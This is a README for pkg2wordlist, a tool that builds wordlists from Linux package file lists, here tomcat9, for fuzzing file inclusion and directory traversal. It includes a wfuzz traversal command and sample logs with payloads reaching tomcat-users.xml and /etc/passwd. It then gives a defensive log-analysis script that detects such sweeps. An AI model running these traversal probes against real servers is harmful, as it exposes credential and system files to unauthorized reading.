~nighthawk/pkg2wordlist

create wordlists out of package contents
51788c58 — Frank Brodbeck 3 months ago
CentOS Support
018ed326 — Frank Brodbeck 3 months ago
no need to maintain list of supported os / distris at two different places
edb921a1 — Frank Brodbeck 3 months ago
more traditional help message

Clone: https://git.sr.ht/~nighthawk/pkg2wordlist (read-only), git@git.sr.ht:~nighthawk/pkg2wordlist (read/write)

# What

Creates a wordlist from the files a package installs. Useful for fuzzing LFIs and directory traversals.

# Why

If you know the target, it's better to use a specific wordlist instead of your general-purpose shotgun. It's both quieter and should yield better results.

# Currently supported Distributions

  • Ubuntu
  • Debian
  • Arch
  • CentOS

# How

## Usage

```
user@attacker:~$ python3 pkg2wordlist.py
usage: pkg2wordlist.py [-h] [-a ARCH] -o {ubuntu,debian,arch,centos} -r
                       RELEASE -p PKG

Felch package contents

  -h                    show this help message
  -a ARCH               arch (default: all)
  -o {ubuntu,debian,arch,centos}
                        distribution/os name
  -r RELEASE            release / repository (e.g. arch)
  -p PKG                packagename

CAVEATS:
The following OS / distris are provided by pkgs.org:

CentOS

for these you need to provide detailed packagenames, e.g. tomcat-7.0.104-1.el6.noarch.rpm

CentOS currently only supports epel
```

## Retrieve the filelist

```
user@attacker:~$ ./pkg2wordlist.py -o ubuntu -r focal -a all -p tomcat9
/etc/cron.daily/tomcat9
/etc/rsyslog.d/tomcat9.conf
/etc/tomcat9/policy.d/01system.policy
/etc/tomcat9/policy.d/02debian.policy
/etc/tomcat9/policy.d/03catalina.policy
/etc/tomcat9/policy.d/04webapps.policy
/etc/tomcat9/policy.d/50local.policy
/lib/systemd/system/tomcat9.service
/usr/lib/sysusers.d/tomcat9.conf
/usr/lib/tmpfiles.d/tomcat9.conf
/usr/libexec/tomcat9/tomcat-start.sh
/usr/libexec/tomcat9/tomcat-update-policy.sh
/usr/share/doc/tomcat9/README.Debian
/usr/share/doc/tomcat9/changelog.Debian.gz
/usr/share/doc/tomcat9/copyright
/usr/share/tomcat9-root/default_root/META-INF/context.xml
/usr/share/tomcat9-root/default_root/index.html
/usr/share/tomcat9/default.template
/usr/share/tomcat9/etc/catalina.properties
/usr/share/tomcat9/etc/context.xml
/usr/share/tomcat9/etc/jaspic-providers.xml
/usr/share/tomcat9/etc/logging.properties
/usr/share/tomcat9/etc/server.xml
/usr/share/tomcat9/etc/tomcat-users.xml
/usr/share/tomcat9/etc/web.xml
/usr/share/tomcat9/logrotate.template
/var/lib/tomcat9/conf
/var/lib/tomcat9/logs
/var/lib/tomcat9/work
```

## Save the wordlist and use it with wfuzz

```
user@attacker:~$ ./pkg2wordlist.py -o ubuntu -r focal -a all -p tomcat9 > ubuntu-focal-tomcat9.wordlist
user@attacker:~$ wfuzz -c -w ubuntu-focal-tomcat9.wordlist -Z http://198.51.100.1/lfi.php=../../../../../FUZZ
```
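The same package file list is just as useful on the defending side: a traversal run like the wfuzz line above leaves one request per wordlist entry in the web server's access log, each carrying a `../` prefix followed by a path the package installs. The script below is an added example, not part of pkg2wordlist; it parses combined-format access log lines (constructed for this example), decodes the query string once, resolves the traversal prefix the way a root-anchored include would, and flags which requests targeted a file from the package list (a constructed subset of the tomcat9 output above). The log format regex and the `page` parameter name are assumptions; they are not taken from the tool.

```python
import re
from posixpath import normpath
from urllib.parse import parse_qsl, urlsplit

# Constructed subset of the Ubuntu focal tomcat9 file list shown above.
TOMCAT9_FILES = {
    "/etc/tomcat9/policy.d/01system.policy",
    "/usr/share/tomcat9/etc/server.xml",
    "/usr/share/tomcat9/etc/tomcat-users.xml",
    "/var/lib/tomcat9/conf",
}

# Constructed access log lines in the Apache/nginx combined format (assumed format).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /lfi.php?page=../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /lfi.php?page=..%2F..%2F..%2F..%2Fetc%2Ftomcat9%2Fpolicy.d%2F01system.policy HTTP/1.1" 200 330
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /lfi.php?page=../../../etc/passwd HTTP/1.1" 500 0
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A traversal attempt in a decoded parameter value: "../" or "..\" anywhere in it.
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")


def traversal_hits(log_text, known_files):
    """Return one record per query parameter that carries a traversal sequence.

    The traversal prefix is collapsed with normpath against "/" to recover the
    absolute path the request resolves to, then looked up in the package list.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes each value once (%2F -> "/").
        for name, value in parse_qsl(query, keep_blank_values=True):
            if not TRAVERSAL_RE.search(value):
                continue
            resolved = normpath("/" + value.replace("\\", "/"))
            hits.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "param": name,
                "status": int(m.group("status")),
                "resolved": resolved,
                "known_package_file": resolved in known_files,
            })
    return hits


def summarize_by_ip(hits):
    """Count traversal requests per client, split by whether a package file was targeted."""
    summary = {}
    for hit in hits:
        entry = summary.setdefault(hit["ip"], {"total": 0, "package_files": 0})
        entry["total"] += 1
        if hit["known_package_file"]:
            entry["package_files"] += 1
    return summary


if __name__ == "__main__":
    for hit in traversal_hits(SAMPLE_LOG, TOMCAT9_FILES):
        flag = "PACKAGE FILE" if hit["known_package_file"] else "other"
        print(f'{hit["ip"]} {hit["status"]} {hit["resolved"]} [{flag}]')
    print(summarize_by_ip(traversal_hits(SAMPLE_LOG, TOMCAT9_FILES)))
```

Feeding a real access log and the full wordlist produced by pkg2wordlist into `traversal_hits` shows which installed files a scan actually reached (a 200 against a package file such as `tomcat-users.xml` deserves immediate attention), while `summarize_by_ip` separates a single probe from a wordlist-driven sweep.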